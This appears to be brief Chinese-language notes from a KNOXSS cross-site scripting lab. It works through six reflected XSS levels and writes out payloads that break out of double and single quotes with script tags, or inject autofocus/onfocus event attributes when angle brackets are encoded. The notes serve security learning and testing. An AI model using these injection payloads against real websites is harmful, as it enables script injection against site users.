knoxss

knoxss

Single Reflection Using QUERY of URL

——01

测试标签

<script>alert(666666)</script>

——02: "

<h1>test</h1>

没有反应，查看源码

现在需要闭合双引号，我计划还是先搞标签

"><h1>test</h1>

标签上：

"><script>alert(666666)</script>

——03: ’

<h1>test</h1>

闭合"，"被实体编码

'闭合

'>来闭合

'><h1>test</h1>

不多的时候：

标签上：

'><script>alert(666666)</script>

——04：" + input属性

<h1>test</h1>

"闭合

发现"闭合了，但是标签无法被闭合，只能看属性

找到 input 对应的xss属性

<input autofocus onfocus=alert(1)>

使用

"autofocus onfocus=alert(1) b="

刷新页面就触发！

——05: ’ + input

"闭合

‘闭合

闭合，但是 > 被实体编码

属性

' autofocus onfocus=alert(1) b="

'后面是否有空格 都行

——06

页面看不到

①源码搜索到：

再去前面找到对应的，未来edit as html

②直接搜索也可（ctrl + F）

<h1>test</h1>

"闭合

使用属性

" autofocus onfocus=alert(1) b="

自己赋值了